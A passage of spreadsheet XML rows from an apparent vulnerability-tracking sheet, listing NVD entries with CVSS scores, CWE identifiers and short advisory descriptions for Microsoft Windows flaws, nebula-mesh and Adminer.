      <c r="I1234" s="5" t="inlineStr"/>
      <c r="J1234" s="5" t="inlineStr"/>
      <c r="K1234" s="5" t="inlineStr"/>
      <c r="L1234" s="5" t="inlineStr"/>
      <c r="M1234" s="5" t="inlineStr"/>
      <c r="N1234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1234" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1234" s="5" t="inlineStr"/>
      <c r="Q1234" s="5" t="inlineStr">
        <is>
          <t>CWE-312, CWE-522</t>
        </is>
      </c>
      <c r="R1234" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. Prior to version 0.3.8, Operator session tokens are stored in plaintext in the operator_sessions table (the token column is the PRIMARY KEY). The session token is a 32-byte random hex value sent directly in a cookie and valid for 24 hours. Anyone who can read the database (backup, snapshot, file copy, or SQL-level disclosure) obtains every active session token and can hijack operator sessions directly, with no further authentication. This issue has been patched in version 0.3.8.</t>
        </is>
      </c>
      <c r="S1234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53603</t>
        </is>
      </c>
    </row>
    <row r="1235">
      <c r="A1235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1235" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53604</t>
        </is>
      </c>
      <c r="D1235" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1235" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1235" s="5" t="inlineStr"/>
      <c r="H1235" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1235" s="5" t="inlineStr"/>
      <c r="J1235" s="5" t="inlineStr"/>
      <c r="K1235" s="5" t="inlineStr"/>
      <c r="L1235" s="5" t="inlineStr"/>
      <c r="M1235" s="5" t="inlineStr"/>
      <c r="N1235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1235" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1235" s="5" t="inlineStr"/>
      <c r="Q1235" s="5" t="inlineStr">
        <is>
          <t>CWE-212, CWE-316</t>
        </is>
      </c>
      <c r="R1235" s="5" t="inlineStr">
        <is>
          <t>nebula-mesh is a self-hosted control plane for Slack Nebula mesh VPN. Prior to version 0.3.8, the web handler renderMobileBundle passes the real *pki.CAResolver directly into mobilebundle.Build. Inside Build, resolver.LoadByID decrypts the CA's ed25519 private key into a *pki.CAManager, but Build never calls CAManager.Wipe() on any return path. As a result, when a mobile-bundle request goes through the web UI and Build returns — especially on error (missing network, invalid prefix, DB error, signing failure) — the plaintext CA private key remains on the Go heap, unwiped, until garbage collection. An attacker able to read process memory (core dump, swap, memory-scraping) can recover the CA signing key, which would allow minting arbitrary host certificates for the mesh. The API handler already does this correctly: it loads the CAManager, defer caMgr.Wipe(), and wraps it in caManagerResolver. Only the web path is affected. This issue has been patched in version 0.3.8.</t>
        </is>
      </c>
      <c r="S1235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53604</t>
        </is>
      </c>
    </row>
    <row r="1236">
      <c r="A1236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1236" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56702</t>
        </is>
      </c>
      <c r="D1236" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1236" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1236" s="5" t="inlineStr"/>
      <c r="H1236" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1236" s="5" t="inlineStr"/>
      <c r="J1236" s="5" t="inlineStr"/>
      <c r="K1236" s="5" t="inlineStr"/>
      <c r="L1236" s="5" t="inlineStr"/>
      <c r="M1236" s="5" t="inlineStr"/>
      <c r="N1236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1236" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P1236" s="5" t="inlineStr"/>
      <c r="Q1236" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R1236" s="5" t="inlineStr">
        <is>
          <t>Adminer versions before 5.4.3 contain an unrestricted file upload vulnerability in the AdminerFileUpload plugin that allows authenticated users to upload PHP files by exploiting a permissive default extension allowlist. Attackers can upload PHP webshells to columns ending in _path and execute arbitrary code as the web-server user when uploadPath is web-served.</t>
        </is>
      </c>
      <c r="S1236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56702</t>
        </is>
      </c>
    </row>
    <row r="1237">
      <c r="A1237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66305</t>
        </is>
      </c>
      <c r="D1237" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1237" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1237" s="5" t="inlineStr"/>
      <c r="H1237" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1237" s="5" t="inlineStr"/>
      <c r="J1237" s="5" t="inlineStr"/>
      <c r="K1237" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L1237" s="5" t="inlineStr"/>
      <c r="M1237" s="5" t="inlineStr"/>
      <c r="N1237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1237" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1237" s="5" t="inlineStr"/>
      <c r="Q1237" s="5" t="inlineStr">
        <is>
          <t>CWE-603</t>
        </is>
      </c>
      <c r="R1237" s="5" t="inlineStr">
        <is>
          <t>Use of client-side authentication in Skype for Business allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S1237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66305</t>
        </is>
      </c>
    </row>
    <row r="1238">
      <c r="A1238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68835</t>
        </is>
      </c>
      <c r="D1238" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1238" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1238" s="5" t="inlineStr"/>
      <c r="H1238" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1238" s="5" t="inlineStr"/>
      <c r="J1238" s="5" t="inlineStr"/>
      <c r="K1238" s="5" t="inlineStr"/>
      <c r="L1238" s="5" t="inlineStr"/>
      <c r="M1238" s="5" t="inlineStr"/>
      <c r="N1238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1238" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1238" s="5" t="inlineStr"/>
      <c r="Q1238" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1238" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68835</t>
        </is>
      </c>
    </row>
    <row r="1239">
      <c r="A1239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68846</t>
        </is>
      </c>
      <c r="D1239" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1239" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1239" s="5" t="inlineStr"/>
      <c r="H1239" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1239" s="5" t="inlineStr"/>
      <c r="J1239" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K12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39" s="5" t="inlineStr"/>
      <c r="M1239" s="5" t="inlineStr"/>
      <c r="N1239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1239" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1239" s="5" t="inlineStr"/>
      <c r="Q1239" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1239" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68846</t>
        </is>
      </c>
    </row>
    <row r="1240">
      <c r="A1240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68889</t>
        </is>
      </c>
      <c r="D1240" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1240" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1240" s="5" t="inlineStr"/>
      <c r="H1240" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1240" s="5" t="inlineStr"/>
      <c r="J1240" s="5" t="inlineStr"/>
      <c r="K1240" s="5" t="inlineStr"/>
      <c r="L1240" s="5" t="inlineStr"/>
      <c r="M1240" s="5" t="inlineStr"/>
      <c r="N1240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1240" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1240" s="5" t="inlineStr"/>
      <c r="Q1240" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R1240" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68889</t>
        </is>
      </c>
    </row>
    <row r="1241">
      <c r="A1241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68893</t>
        </is>
      </c>
      <c r="D1241" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1241" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1241" s="5" t="inlineStr"/>
      <c r="H1241" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1241" s="5" t="inlineStr"/>
      <c r="J1241" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1241" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1241" s="5" t="inlineStr"/>
      <c r="M1241" s="5" t="inlineStr"/>
      <c r="N1241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1241" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1241" s="5" t="inlineStr"/>
      <c r="Q1241" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1241" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Licensing Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68893</t>
        </is>
      </c>
    </row>
    <row r="1242">
      <c r="A1242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69272</t>
        </is>
      </c>
      <c r="D1242" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1242" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1242" s="5" t="inlineStr"/>
      <c r="H1242" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1242" s="5" t="inlineStr"/>
      <c r="J1242" s="5" t="inlineStr"/>
      <c r="K1242" s="5" t="inlineStr"/>
      <c r="L1242" s="5" t="inlineStr"/>
      <c r="M1242" s="5" t="inlineStr"/>
      <c r="N1242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1242" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1242" s="5" t="inlineStr"/>
      <c r="Q1242" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1242" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69272</t>
        </is>
      </c>
    </row>
    <row r="1243">
      <c r="A1243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69274</t>
        </is>
      </c>
      <c r="D1243" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1243" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1243" s="5" t="inlineStr"/>
      <c r="H1243" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1243" s="5" t="inlineStr"/>
      <c r="J1243" s="5" t="inlineStr"/>
      <c r="K1243" s="5" t="inlineStr"/>
      <c r="L1243" s="5" t="inlineStr"/>
      <c r="M1243" s="5" t="inlineStr"/>
      <c r="N1243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1243" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1243" s="5" t="inlineStr"/>
      <c r="Q1243" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1243" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69274</t>
        </is>
      </c>
    </row>
    <row r="1244">
      <c r="A1244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69296</t>
        </is>
      </c>
      <c r="D1244" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1244" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1244" s="5" t="inlineStr"/>
      <c r="H1244" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1244" s="5" t="inlineStr"/>
      <c r="J1244" s="5" t="inlineStr"/>
      <c r="K1244" s="5" t="inlineStr"/>
      <c r="L1244" s="5" t="inlineStr"/>
      <c r="M1244" s="5" t="inlineStr"/>
      <c r="N1244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1244" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1244" s="5" t="inlineStr"/>
      <c r="Q1244" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1244" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69296</t>
        </is>
      </c>
    </row>
    <row r="1245">
      <c r="A1245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69305</t>
        </is>
      </c>
      <c r="D1245" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1245" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1245" s="5" t="inlineStr"/>
      <c r="H1245" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1245" s="5" t="inlineStr"/>
      <c r="J1245" s="5" t="inlineStr"/>
      <c r="K1245" s="5" t="inlineStr"/>
      <c r="L1245" s="5" t="inlineStr"/>
      <c r="M1245" s="5" t="inlineStr"/>
      <c r="N1245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1245" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1245" s="5" t="inlineStr"/>
      <c r="Q1245" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1245" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69305</t>
        </is>
      </c>
    </row>
    <row r="1246">
      <c r="A1246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69313</t>
        </is>
      </c>
      <c r="D1246" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1246" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1246" s="5" t="inlineStr"/>
      <c r="H1246" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1246" s="5" t="inlineStr"/>
      <c r="J1246" s="5" t="inlineStr"/>
      <c r="K1246" s="5" t="inlineStr"/>
      <c r="L1246" s="5" t="inlineStr"/>
      <c r="M1246" s="5" t="inlineStr"/>
      <c r="N1246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1246" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1246" s="5" t="inlineStr"/>
      <c r="Q1246" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1246" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69313</t>
        </is>
      </c>
    </row>
    <row r="1247">
      <c r="A1247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69314</t>
        </is>
      </c>
      <c r="D1247" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1247" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1247" s="5" t="inlineStr"/>
      <c r="H1247" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1247" s="5" t="inlineStr"/>
      <c r="J1247" s="5" t="inlineStr"/>
      <c r="K1247" s="5" t="inlineStr"/>
      <c r="L1247" s="5" t="inlineStr"/>
      <c r="M1247" s="5" t="inlineStr"/>
      <c r="N1247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1247" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1247" s="5" t="inlineStr"/>
      <c r="Q1247" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1247" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69314</t>
        </is>
      </c>
    </row>
    <row r="1248">
      <c r="A1248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69336</t>
        </is>
      </c>
      <c r="D1248" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1248" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1248" s="5" t="inlineStr"/>
      <c r="H1248" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1248" s="5" t="inlineStr"/>
      <c r="J1248" s="5" t="inlineStr"/>
      <c r="K1248" s="5" t="inlineStr"/>
      <c r="L1248" s="5" t="inlineStr"/>
      <c r="M1248" s="5" t="inlineStr"/>
      <c r="N1248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1248" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1248" s="5" t="inlineStr"/>
      <c r="Q1248" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1248" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69336</t>
        </is>
      </c>
    </row>
    <row r="1249">
      <c r="A1249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69337</t>
        </is>
      </c>
      <c r="D1249" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1249" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1249" s="5" t="inlineStr"/>
      <c r="H1249" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1249" s="5" t="inlineStr"/>
      <c r="J1249" s="5" t="inlineStr"/>
      <c r="K1249" s="5" t="inlineStr"/>
      <c r="L1249" s="5" t="inlineStr"/>
      <c r="M1249" s="5" t="inlineStr"/>
      <c r="N1249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1249" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1249" s="5" t="inlineStr"/>
      <c r="Q1249" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R1249" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Registry allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69337</t>
        </is>
      </c>
    </row>
    <row r="1250">
      <c r="A1250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69338</t>
        </is>
      </c>
      <c r="D1250" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1250" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1250" s="5" t="inlineStr"/>
      <c r="H1250" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1250" s="5" t="inlineStr"/>
      <c r="J1250" s="5" t="inlineStr"/>
      <c r="K1250" s="5" t="inlineStr"/>
      <c r="L1250" s="5" t="inlineStr"/>
      <c r="M1250" s="5" t="inlineStr"/>
      <c r="N1250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1250" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1250" s="5" t="inlineStr"/>
      <c r="Q1250" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1250" s="5" t="inlineStr">
        <is>
          <t>Use after free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69338</t>
        </is>
      </c>
    </row>
    <row r="1251">
      <c r="A1251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69340</t>
        </is>
      </c>
      <c r="D1251" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1251" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1251" s="5" t="inlineStr"/>
      <c r="H1251" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1251" s="5" t="inlineStr"/>
      <c r="J1251" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K12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51" s="5" t="inlineStr"/>
      <c r="M1251" s="5" t="inlineStr"/>
      <c r="N1251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1251" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1251" s="5" t="inlineStr"/>
      <c r="Q1251" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="R1251" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S1251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69340</t>
        </is>
      </c>
